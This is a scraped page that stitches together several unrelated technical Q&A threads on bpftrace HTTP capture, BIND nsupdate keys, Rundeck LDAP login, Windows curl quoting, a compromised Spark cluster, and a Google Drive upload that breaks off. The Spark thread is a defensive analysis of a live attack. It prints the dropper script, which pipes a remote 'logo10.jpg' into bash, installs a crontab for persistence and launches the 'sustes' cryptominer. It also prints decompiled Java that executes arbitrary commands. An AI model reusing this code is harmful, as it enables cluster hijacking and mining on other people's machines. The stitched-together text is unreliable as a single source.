I want to use bpftrace to capture all of the HTTP request content of my program.
cat /etc/redhat-release
CentOS Linux release 8.0.1905 (Core)
uname -a
Linux infra-test 4.18.0-305.12.1.el8_4.x86_64 #1 SMP Wed Aug 11
01:59:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
My bpftrace script (http.bt):
BEGIN
{
  printf("Welcome to Offensive BPF... Use Ctrl-C to exit.\n");
}

tracepoint:syscalls:sys_enter_accept*
{
  @sk[tid] = args->upeer_sockaddr;
}

tracepoint:syscalls:sys_exit_accept*
/ @sk[tid] /
{
  @sys_accepted[tid] = @sk[tid];
}

tracepoint:syscalls:sys_enter_read
/ @sys_accepted[tid] /
{
  printf("->sys_enter_read for allowed thread (fd: %d)\n", args->fd);
  @sys_read[tid] = args->buf;
}

tracepoint:syscalls:sys_exit_read
{
  if (@sys_read[tid] != 0)
  {
    $len = args->ret;
    $cmd = str(@sys_read[tid], $len);
    printf("*** Command: %s\n", $cmd);
  }
}

END
{
  clear(@sk);
  clear(@sys_read);
  clear(@sys_accepted);
  printf("Exiting. Bye.\n");
}
I start my server on port 8080 and then start bpftrace:
Attaching 8 probes...
Welcome to Offensive BPF... Use Ctrl-C to exit.
Then I run curl:
curl -H "traceparent: 00-123-456-01" 127.0.0.1:8080/misc/ping -lv
bpftrace only outputs:
bpftrace --unsafe http.bt
Attaching 8 probes...
Welcome to Offensive BPF... Use Ctrl-C to exit.
->sys_enter_read for allowed thread (fd: 15)
*** Command: GET /misc/ping HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: curl
->sys_enter_read for allowed thread (fd: 15)
*** Command: GET /misc/ping HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: curl
The output is not the whole curl request content, and I don't know why. Can anyone help?
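As a hedged aside on the script above: bpftrace's str() builtin copies at most BPFTRACE_STRLEN bytes (64 by default, capped at around 200 in many releases), so each printed command would be cut off after the first few header lines even when read() returned more data. One way to test that assumption without changing the script:
sudo BPFTRACE_STRLEN=200 bpftrace --unsafe http.bt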
Related
I am using the nsupdate command to update a DNS zone, but I receive the error message "update failed: REFUSED". I created the key using "rndc-confgen -a -c /etc/remote_rndc_key".
My named.conf is as follows:
options {
listen-on port 53 { 9.82.159.110; };
listen-on-v6 port 53 { ::1; };
directory "/var/named";
dump-file "/var/named/data/cache_dump.db";
statistics-file "/var/named/data/named_stats.txt";
memstatistics-file "/var/named/data/named_mem_stats.txt";
secroots-file "/var/named/data/named.secroots";
recursing-file "/var/named/data/named.recursing";
allow-query { any; };
allow-update {key remote_rndc_key; };
recursion yes;
dnssec-enable no;
dnssec-validation no;
pid-file "/run/named/named.pid";
};
logging {
channel default_debug {
file "data/named.run";
severity debug 3;
};
};
zone "." IN {
type hint;
file "named.ca";
};
include "/etc/remote_rndc_key";
include "/etc/named.rfc1912.zones";
include "/etc/named.root.key";
zone "test.com" IN {
type master;
file "test.com.zone";
};
zone "82.9.in-addr.arpa" IN {
type master;
file "test.com.local";
};
key "remote_rndc_key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
controls {
inet 9.82.159.110 port 953
allow { 9.82.224.110; } keys { "remote_rndc_key"; };
};
/etc/remote_rndc_key:
key "rndc-key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
/var/named/test.com.zone:
$TTL 1D
@ IN SOA ns1 rname.invalid. (
2019062901 ; serial
5M ; refresh
1H ; retry
1W ; expire
3H ) ; minimum
NS ns1
ns1 IN A 9.82.159.110
www IN A 9.82.100.100
Using nsupdate:
[root@localhost tmp]# nsupdate -v -d -k ./remote_rndc_key
Creating key...
Creating key...
namefromtext
keycreate
> server 9.82.159.110
> update add ftps.test.com 600 A 1.1.1.2
> send
Reply from SOA query:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 40666
;; flags: qr aa ra; QUESTION: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;ftps.test.com. IN SOA
;; AUTHORITY SECTION:
test.com. 0 IN SOA ns1.test.com. rname.invalid. 2019062901 300 3600 604800 10800
;; TSIG PSEUDOSECTION:
rndc-key. 0 ANY TSIG hmac-md5.sig-alg.reg.int. 1649854961 300 16 MFdWnAJcNEQ17QovaBmzTw== 40666 NOERROR 0
Found zone name: test.com
The master is: ns1.test.com
Sending update to 9.82.159.110#53
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id: 59745
;; flags:; ZONE: 1, PREREQ: 0, UPDATE: 1, ADDITIONAL: 1
;; UPDATE SECTION:
ftps.test.com. 600 IN A 1.1.1.2
;; TSIG PSEUDOSECTION:
rndc-key. 0 ANY TSIG hmac-md5.sig-alg.reg.int. 1649854961 300 16 vJjzs0bT4QxHW40mL/MT7g== 59745 NOERROR 0
Reply from update query:
;; ->>HEADER<<- opcode: UPDATE, status: REFUSED, id: 59745
;; flags: qr; ZONE: 1, PREREQ: 0, UPDATE: 0, ADDITIONAL: 1
;; ZONE SECTION:
;test.com. IN SOA
;; TSIG PSEUDOSECTION:
rndc-key. 0 ANY TSIG hmac-md5.sig-alg.reg.int. 1649854961 300 16 FAcO+t5JUdOJdC1mRuHNeA== 59745 NOERROR 0
The named server log is as follows:
[root@localhost named]# systemctl status named
● named.service - Berkeley Internet Name Domain (DNS)
Loaded: loaded (/usr/lib/systemd/system/named.service; enabled; vendor preset: disabled)
Active: active (running) since Wed 2022-04-13 20:36:14 CST; 29min ago
Process: 3371415 ExecStartPre=/bin/bash -c if [ ! "$DISABLE_ZONE_CHECKING" == "yes" ]; then /usr/sbin/named-checkconf -z "$NAMEDCONF"; else echo "Checking of zone files is disabled"; fi (code=exited, >
Process: 3371418 ExecStart=/usr/sbin/named -u named -c ${NAMEDCONF} $OPTIONS (code=exited, status=0/SUCCESS)
Main PID: 3371421 (named)
Tasks: 35
Memory: 88.8M
CGroup: /system.slice/named.service
└─3371421 /usr/sbin/named -u named -c /etc/named.conf
Apr 13 20:36:32 localhost.localdomain named[3371421]: client @0x7ff1f0108770 9.82.224.110#59471/key rndc-key: signer "rndc-key" denied
What can be the reason?
I confused the key name with the key file name:
/etc/remote_rndc_key:
key "rndc-key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
should be changed to:
key "remote_rndc_key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
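After matching the key name, a minimal re-test sketch (assuming the same server, zone, and key file path as above):
rndc reload    # or: systemctl restart named, so named picks up the corrected key
nsupdate -v -d -k /etc/remote_rndc_key <<'EOF'
server 9.82.159.110
update add ftps.test.com 600 A 1.1.1.2
send
EOF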
I got this error today on my "hidden primary" BIND DNS server and wasted a couple of hours trying to find the reason for the failure.
In the end, I got tired and tried again, and then it worked.
So my advice is: try again, it may be a bug.
I suddenly got an issue with my Rundeck: whenever I try to access it, it says "Invalid username and password".
Here are the errors from service.log:
2019-10-18 17:06:58.447:INFO:cdrjj.JettyCachingLdapLoginModule:qtp683347804-24: Login attempts: 1, Hits: 0, Ratio: 0%.
2019-10-18 17:06:58.468:INFO:cdrjj.JettyCachingLdapLoginModule:qtp683347804-24: Attempting authentication: CN=Lastname, Firstname,OU=Intern,OU=USERS,OU=City,OU=Country,DC=company,DC=lan
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: AbstractSharedLoginModule: login with sharedLoginState auth, try? false, use? true
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: JettyRolePropertyFileLoginModule: userInfo found for first.last? true
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: AbstractSharedLoginModule: using login result: true
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: role names: [first.last, ADMINGRP]
2019-10-18 17:06:58.553:WARN:oejj.JAASLoginService:qtp683347804-24:
javax.security.auth.login.LoginException: java.lang.NullPointerException: invalid null input(s)|?at java.util.Objects.requireNonNull(Objects.java:239)|?at javax.security.auth.Subject$SecureSet.add(Subject.java:1321)|?at java.util.Collections$SynchronizedCollection.add(Collections.java:2048)|?at org.eclipse.jetty.jaas.spi.AbstractLoginModule$JAASUserInfo.setJAASInfo(AbstractLoginModule.java:95)|?at org.eclipse.jetty.jaas.spi.AbstractLoginModule.commit(AbstractLoginModule.java:189)|?at com.dtolabs.rundeck.jetty.jaas.JettyCachingLdapLoginModule.commit(JettyCachingLdapLoginModule.java:895)|?at com.dtolabs.rundeck.jetty.jaas.JettyCombinedLdapLoginModule.commit(JettyCombinedLdapLoginModule.java:182)|?at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)|?at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:90)|?at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:55)|?at java.lang.reflect.Method.invoke(Method.java:508)|?at javax.security.auth.login.LoginContext.invoke(LoginContext.java:788)|?at javax.security.auth.login.LoginContext.access$000(LoginContext.java:196)|?at javax.security.auth.login.LoginContext$4.run(LoginContext.java:698)|?at javax.security.auth.login.LoginContext$4.run(LoginContext.java:696)|?at java.security.AccessController.doPrivileged(AccessController.java:734)|?at javax.security.auth.login.LoginContext.invokePriv(LoginContext.java:696)|?at javax.security.auth.login.LoginContext.login(LoginContext.java:598)|?at org.eclipse.jetty.jaas.JAASLoginService.login(JAASLoginService.java:241)|?at org.eclipse.jetty.security.authentication.LoginAuthenticator.login(LoginAuthenticator.java:52)|?at org.eclipse.jetty.security.authentication.FormAuthenticator.login(FormAuthenticator.java:192)|?at org.eclipse.jetty.security.authentication.FormAuthenticator.validateRequest(FormAuthenticator.java:229)|?at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:499)|?at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:213)|?at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1097)|?at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:448)|?at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:175)|?at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1031)|?at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:136)|?at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)|?at org.eclipse.jetty.server.Server.handle(Server.java:446)|?at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:271)|?at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:246)|?at org.eclipse.jetty.io.AbstractConnection$ReadCallback.run(AbstractConnection.java:358)|?at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:601)|?at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:532)|?at java.lang.Thread.run(Thread.java:818)|
at javax.security.auth.login.LoginContext.invoke(LoginContext.java:890)
at javax.security.auth.login.LoginContext.access$000(LoginContext.java:196)
at javax.security.auth.login.LoginContext$4.run(LoginContext.java:698)
at javax.security.auth.login.LoginContext$4.run(LoginContext.java:696)
at java.security.AccessController.doPrivileged(AccessController.java:734)
at javax.security.auth.login.LoginContext.invokePriv(LoginContext.java:696)
at javax.security.auth.login.LoginContext.login(LoginContext.java:598)
at org.eclipse.jetty.jaas.JAASLoginService.login(JAASLoginService.java:241)
at org.eclipse.jetty.security.authentication.LoginAuthenticator.login(LoginAuthenticator.java:52)
at org.eclipse.jetty.security.authentication.FormAuthenticator.login(FormAuthenticator.java:192)
at org.eclipse.jetty.security.authentication.FormAuthenticator.validateRequest(FormAuthenticator.java:229)
at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:499)
at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:213)
at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1097)
at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:448)
at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:175)
at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1031)
at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:136)
at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
at org.eclipse.jetty.server.Server.handle(Server.java:446)
at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:271)
at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:246)
at org.eclipse.jetty.io.AbstractConnection$ReadCallback.run(AbstractConnection.java:358)
at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:601)
at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:532)
at java.lang.Thread.run(Thread.java:818)
Here is my Profile file:
RDECK_INSTALL="${RDECK_INSTALL:-/var/lib/rundeck}"
RDECK_BASE="${RDECK_BASE:-/var/lib/rundeck}"
RDECK_CONFIG="${RDECK_CONFIG:-/etc/rundeck}"
RDECK_SERVER_BASE="${RDECK_SERVER_BASE:-$RDECK_BASE}"
RDECK_SERVER_CONFIG="${RDECK_SERVER_CONFIG:-$RDECK_CONFIG}"
RDECK_SERVER_DATA="${RDECK_SERVER_DATA:-$RDECK_BASE/data}"
RDECK_PROJECTS="${RDECK_PROJECTS:-$RDECK_BASE/projects}"
RUNDECK_TEMPDIR="${RUNDECK_TEMPDIR:-/tmp/rundeck}"
RUNDECK_WORKDIR="${RUNDECK_TEMPDIR:-$RDECK_BASE/work}"
RUNDECK_LOGDIR="${RUNDECK_LOGDIR:-$RDECK_BASE/logs}"
RDECK_JVM_SETTINGS="${RDECK_JVM_SETTINGS:- -Xmx1024m -Xms256m -XX:MaxPermSize=256m -server}"
RDECK_TRUSTSTORE_FILE="${RDECK_TRUSTSTORE_FILE:-$RDECK_CONFIG/ssl/truststore}"
RDECK_TRUSTSTORE_TYPE="${RDECK_TRUSTSTORE_TYPE:-jks}"
JAAS_CONF="${JAAS_CONF:-$RDECK_CONFIG/jaas-loginmodule.conf}"
LOGIN_MODULE="${LOGIN_MODULE:-RDpropertyfilelogin}"
RDECK_HTTP_PORT=${RDECK_HTTP_PORT:-4440}
RDECK_HTTPS_PORT=${RDECK_HTTPS_PORT:-4443}
if [ -z "$JAVA_CMD" ] && [ -n "$JAVA_HOME" ] && [ -x "$JAVA_HOME/bin/java" ] ; then
JAVA_CMD=$JAVA_HOME/bin/java
PATH=$PATH:$JAVA_HOME/bin
export JAVA_HOME
elif [ -z "$JAVA_CMD" ] ; then
JAVA_CMD=java
fi
for jar in $(find $RDECK_INSTALL/cli -name '*.jar') ; do
CLI_CP=${CLI_CP:+$CLI_CP:}$jar
done
for jar in $(find $RDECK_INSTALL/bootstrap -name '*.jar') ; do
BOOTSTRAP_CP=${BOOTSTRAP_CP:+$BOOTSTRAP_CP:}$jar
done
RDECK_JVM="-Djava.security.auth.login.config=/etc/rundeck/jaas-activedirectory.conf
-Dloginmodule.name=multiauth
-Drdeck.config=$RDECK_CONFIG
-Drundeck.server.configDir=$RDECK_SERVER_CONFIG
-Dserver.datastore.path=$RDECK_SERVER_DATA/rundeck
-Drundeck.server.serverDir=$RDECK_INSTALL
-Drdeck.projects=$RDECK_PROJECTS
-Drdeck.runlogs=$RUNDECK_LOGDIR
-Drundeck.config.location=$RDECK_CONFIG/rundeck-config.properties
-Djava.io.tmpdir=$RUNDECK_TEMPDIR
-Drundeck.server.workDir=$RUNDECK_WORKDIR
-Dserver.http.port=$RDECK_HTTP_PORT"
if [ -n "$RUNDECK_WITH_SSL" ] ; then
RDECK_JVM="$RDECK_JVM -Drundeck.ssl.config=$RDECK_SERVER_CONFIG/ssl/ssl.properties -Dserver.https.port=${RDECK_HTTPS_PORT}"
RDECK_SSL_OPTS="${RDECK_SSL_OPTS:- -Djavax.net.ssl.trustStore=$RDECK_TRUSTSTORE_FILE -Djavax.net.ssl.trustStoreType=$RDECK_TRUSTSTORE_TYPE -Djava.protocol.handler.pkgs=com.sun.net.ssl.internal.www.protocol}"
fi
unset JRE_HOME
umask 002
rundeckd="$JAVA_CMD $RDECK_JVM $RDECK_JVM_OPTS -cp $BOOTSTRAP_CP com.dtolabs.rundeck.RunServer $RDECK_BASE"
Here is my jaas-activedirectory.conf:
multiauth {
com.dtolabs.rundeck.jetty.jaas.JettyCombinedLdapLoginModule required
debug="true"
contextFactory="com.sun.jndi.ldap.LdapCtxFactory"
providerUrl="ldap://ldaphostname.example.lan:3268"
bindDn="ebi_ad_d@example.lan"
bindPassword="maskpassword"
authenticationMethod="simple"
forceBindingLogin="true"
userBaseDn="DC=example,DC=lan"
userRdnAttribute="sAMAccountName"
userIdAttribute="sAMAccountName"
userPasswordAttribute="unicodePwd"
userObjectClass="user"
roleBaseDn="OU=Rundeck,OU=GROUPS APPLICATION,OU=CITY,OU=COUNTRY,DC=example,DC=lan"
roleNameAttribute="sAMAccountName"
roleMemberAttribute="member"
roleObjectClass="group"
cacheDurationMillis="300000"
supplementalRoles="user"
reportStatistics="true"
timeoutRead="10000"
timeoutConnect="20000"
nestedGroups="true"
ignoreRoles="true"
storePass="true";
org.eclipse.jetty.jaas.spi.PropertyFileLoginModule sufficient
debug="true"
storePass="true"
file="/etc/rundeck/realm.properties";
org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule required
debug="true"
useFirstPass="true"
file="/etc/rundeck/realm.properties"
refreshInterval="60"
caseInsensitive="true";
};
My Rundeck details:
Rundeck version: 2.10
install type: rpm
OS Name/version: RHEL release 6
DB Type/version: h2
Check the order of your modules; I tested with "sufficient" first and "required" later, and it works.
Also, check how you reference your users (userBaseDn) and roles (roleBaseDn) in your LDAP section.
Make sure that you're launching the Rundeck instance with the -Drundeck.jaaslogin=true, -Dloginmodule.conf.name=jaas-multiauth.conf, and -Dloginmodule.name=multiauth parameters, as sketched below.
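As a minimal sketch of that last point, assuming the profile shown in the question (which uses jaas-activedirectory.conf rather than jaas-multiauth.conf, so the conf name below follows the question), the parameters could be appended to RDECK_JVM like this:
# Hypothetical addition to the Rundeck profile; adjust the conf file name to match your setup.
RDECK_JVM="$RDECK_JVM -Drundeck.jaaslogin=true -Dloginmodule.conf.name=jaas-activedirectory.conf -Dloginmodule.name=multiauth"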
I'm following this tutorial, TensorFlow Serving with Docker, to run this query:
curl -d '{"instances": [1.0, 2.0, 5.0]}' \
-X POST http://localhost:8501/v1/models/half_plus_two:predict
It returns
C:\WINDOWS\system32>curl -d '{"instances": [1.0, 2.0, 5.0]}' -X POST http://localhost:8501/v1/models/half_plus_two:predict
curl: (3) [globbing] bad range in column 2
curl: (6) Could not resolve host: 2.0,
curl: (3) [globbing] unmatched close brace/bracket in column 4
{ "error": "JSON Parse error: Invalid value. at offset: 0" }
But Docker is running fine:
PS E:\git_portable> docker run -t --rm -p 8501:8501 -v "E:\git_portable\serving\tensorflow_serving\servables\tensorflow\testdata\saved_model_half_plus_two_cpu:/models/half_plus_two" -e MODEL_NAME=half_plus_two tensorflow/serving
2019-11-10 07:11:17.037045: I tensorflow_serving/model_servers/server.cc:85] Building single TensorFlow model file config: model_name: half_plus_two model_base_path: /models/half_plus_two
2019-11-10 07:11:17.037797: I tensorflow_serving/model_servers/server_core.cc:462] Adding/updating models.
2019-11-10 07:11:17.037861: I tensorflow_serving/model_servers/server_core.cc:573] (Re-)adding model: half_plus_two
2019-11-10 07:11:17.158245: I tensorflow_serving/core/basic_manager.cc:739] Successfully reserved resources to load servable {name: half_plus_two version: 123}
2019-11-10 07:11:17.158435: I tensorflow_serving/core/loader_harness.cc:66] Approving load for servable version {name: half_plus_two version: 123}
2019-11-10 07:11:17.158496: I tensorflow_serving/core/loader_harness.cc:74] Loading servable version {name: half_plus_two version: 123}
2019-11-10 07:11:17.158573: I external/org_tensorflow/tensorflow/cc/saved_model/reader.cc:31] Reading SavedModel from: /models/half_plus_two/00000123
2019-11-10 07:11:17.170610: I external/org_tensorflow/tensorflow/cc/saved_model/reader.cc:54] Reading meta graph with tags { serve }
2019-11-10 07:11:17.172642: I external/org_tensorflow/tensorflow/core/platform/cpu_feature_guard.cc:142] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA
2019-11-10 07:11:17.212202: I external/org_tensorflow/tensorflow/cc/saved_model/loader.cc:202] Restoring SavedModel bundle.
2019-11-10 07:11:17.230431: I external/org_tensorflow/tensorflow/cc/saved_model/loader.cc:151] Running initialization op on SavedModel bundle at path: /models/half_plus_two/00000123
2019-11-10 07:11:17.236016: I external/org_tensorflow/tensorflow/cc/saved_model/loader.cc:311] SavedModel load for tags { serve }; Status: success. Took 77445 microseconds.
2019-11-10 07:11:17.237262: I tensorflow_serving/servables/tensorflow/saved_model_warmup.cc:105] No warmup data file found at /models/half_plus_two/00000123/assets.extra/tf_serving_warmup_requests
2019-11-10 07:11:17.247605: I tensorflow_serving/core/loader_harness.cc:87] Successfully loaded servable version {name: half_plus_two version: 123}
2019-11-10 07:11:17.250931: I tensorflow_serving/model_servers/server.cc:353] Running gRPC ModelServer at 0.0.0.0:8500 ...
[warn] getaddrinfo: address family for nodename not supported
2019-11-10 07:11:17.252948: I tensorflow_serving/model_servers/server.cc:373] Exporting HTTP/REST API at:localhost:8501 ...
When I run plain curl to localhost, it returns fine.
C:\WINDOWS\system32>curl http://localhost:8501/v1/models/half_plus_two
{
"model_version_status": [
{
"version": "123",
"state": "AVAILABLE",
"status": {
"error_code": "OK",
"error_message": ""
}
}
]
}
What am I doing wrong here?
We had the same issue. As explained in this link, Windows: curl with json data on the command line:
Windows's cmd doesn't support strings with single quotes. Use " and
escape the inner ones with \".
Now:
C:\WINDOWS\system32>curl -d "{\"instances\": [1.0, 2.0, 5.0]}" \
-X POST http://127.0.0.1:8501/v1/models/half_plus_two:predict
{
"predictions": [2.5, 3.0, 4.5
]
}
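Another option that sidesteps cmd quoting entirely, offered as a sketch: save the JSON body to a file (request.json below is a hypothetical file containing {"instances": [1.0, 2.0, 5.0]}) and let curl read it with -d @file:
C:\WINDOWS\system32>curl -d @request.json -X POST http://localhost:8501/v1/models/half_plus_two:predict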
After a lot of searching and research, I turned here for help.
The problem is that once a Spark cluster is built (one master and 4 workers with different IP addresses), each executor will constantly submit a "driver". From the web UI, I can see a class named "Exploit" submitted with the "driver" (see the web UI screenshot).
The following is the head and the tail of the log file of one worker:
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker@129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh"
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker@129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector@350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker@129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found there is an "Exploit" code which hacks Spark clusters by taking advantage of the fact that anyone can submit applications to an unsecured Spark cluster.
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster was hacked, because this problem still exists even after enabling authentication.
My question is: has anyone else had this problem? And why does this happen?
THIS IS VERY ALARMING!
Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, that is a wget to download the script to /var/tmp and then execute it.
The downloaded script fetches a "jpg" and pipes it to bash. THIS IS NOT AN IMAGE:
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg contains a cron job that contains even more source code that will be run on your cluster. You are probably seeing this job being submitted because it is starting a scheduled job.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
public class Exploit {
public Exploit() {
}
public static void main(String[] var0) throws Exception {
String[] var1 = var0[0].split(",");
String[] var2 = var1;
int var3 = var1.length;
for(int var4 = 0; var4 < var3; ++var4) {
String var5 = var2[var4];
System.out.println(var5);
System.out.println(executeCommand(var5.trim()));
System.out.println("==============================================");
}
}
private static String executeCommand(String var0) {
StringBuilder var1 = new StringBuilder();
try {
Process var2 = Runtime.getRuntime().exec(var0);
var2.waitFor();
BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));
String var4;
while((var4 = var3.readLine()) != null) {
var1.append(var4).append("\n");
}
} catch (Exception var5) {
var5.printStackTrace();
}
return var1.toString();
}
}
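Based only on the artifacts the script above drops, a hedged sketch for checking whether a worker host is affected (the paths and the "sustes" process name come straight from that script; adapt as needed):
# Look for the malicious cron entry, the dropped files, and the 'sustes' miner process
crontab -l 2>/dev/null | grep -n '192.99.142.248'
ls -l /var/tmp/sustes /var/tmp/config.json /var/tmp/a.sh /tmp/cron 2>/dev/null
ps -fe | grep -w sustes | grep -v grep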
I'm developing a program for a platform that does not have support libraries to upload or download files from Google Drive.
So I need to craft the socket commands by hand.
But I'm finding it difficult to achieve.
My program will send files of type .txt, .jpg, .html, and others.
I will have to send and download these files from the command line. I've tried, but I was not successful...
First, to get a valid token, I'm using this link, which the user opens in a browser; they then copy the token into my program so it can modify their files:
https://accounts.google.com/o/oauth2/v2/auth?scope=profile&response_type=code&state=security_token&redirect_uri=urn:ietf:wg:oauth:2.0:oob&client_id=165834794520-tit58jbii1u8itv8q8urjlda1tobsvf1.apps.googleusercontent.com
Apparently this part works correctly.
But when I use the token to send a file, it does not work.
I made this request as a test, and it does not work!
I've changed the token several times thinking it might be the problem, but it's not.
Weird.
I will send my files from the command line, so I am not sure which method I should use, simple or multipart...
My files are small, but some may be around 5 MB.
Here is what I send in the terminal (raw socket):
S: POST /upload/drive/v3/files?uploadType=multipart HTTP/1.1
S: Host: www.googleapis.com
S: Authorization: Bearer 4/AABZB61gFY8NqyXxxxxxxxxxxr7CThy1BuDOOGL7aLiRab80
S: Content-Type: multipart/related; boundary=foo_bar_baz
S: Content-Length: 167
S:
S: --foo_bar_baz
S: Content-Type: application/json; charset=UTF-8
S:
S: {
S: "name": "myObject"
S: }
S:
S: --foo_bar_baz
S: Content-Type: image/jpeg
S:
S: [JPEG_TEST]
S: --foo_bar_baz--
Return:
HTTP/1.1 401 Unauthorized
X-GUploader-UploadID: AEnB2UoolTbsyS_gK21G07sUJrIggzH_ivy1a_KvzvnvhiyqIOYqej8JhNQ1tmZ0KiIlrYjOTejlxXYIoSiTNs3mLiLBWzCb-A
Vary: Origin
Vary: X-Origin
WWW-Authenticate: Bearer realm="https://accounts.google.com/", error=invalid_token
Content-Type: application/json; charset=UTF-8
Content-Length: 249
Date: Wed, 11 Jul 2018 12:51:18 GMT
Server: UploadServer
Alt-Svc: quic=":443"; ma=2592000; v="43,42,41,39,35"
{
"error": {
"errors": [
{
"domain": "global",
